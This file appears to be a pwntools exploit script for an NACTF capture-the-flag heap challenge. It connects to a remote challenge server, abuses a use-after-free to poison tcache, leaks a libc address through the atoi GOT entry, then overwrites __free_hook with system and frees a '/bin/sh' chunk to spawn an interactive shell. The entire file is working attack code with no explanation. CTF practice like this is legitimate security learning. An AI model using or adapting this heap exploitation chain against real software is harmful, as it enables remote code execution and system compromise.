nactf_covid.py

#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random

#Utils
def add():
	io.sendlineafter('> ','1')

def edit(idx,data):
	io.sendlineafter('> ','2')
	io.sendlineafter('?\n',f'{idx}')
	io.sendafter('URL?\n',data)

def delete(idx):
	io.sendlineafter('> ','3')
	io.sendlineafter('?\n',f'{idx}')

def list():
	io.sendlineafter('> ','4')
	return io.recvuntil('otal')

#Addr
atoi_got = 0x403fd0

#libc 2.27 ?
libc = ELF('./libc.so.6')
atoi_offset = 0x40680
system_offset = 0x4f440
__free_hook = 0x3ed8e8

if __name__ == '__main__':
#	io = process('./cttt',env={'LD_PRELOAD':libc.path})
	io = remote('challenges.ctfd.io', 30252)

	[add() for i in xrange(2)] #1~2
	delete(1)
	delete(2)
	edit(2,p64(atoi_got)+b'\n')
	add() #3
	add() #4
	libc_leak = u64(list().split(b'\n')[6].split(b')')[1].replace(b' ',b'').ljust(8,b'\0'))
	libc_base = libc_leak - atoi_offset
	print(hex(libc_base))

	delete(3)
	edit(3,p64(libc_base+__free_hook-0x8)+b'\n')
	add() #4
	add() #5
	edit(5,b'/bin/sh\0'+p64(libc_base+system_offset)+b'\n')
	delete(5)
	io.interactive()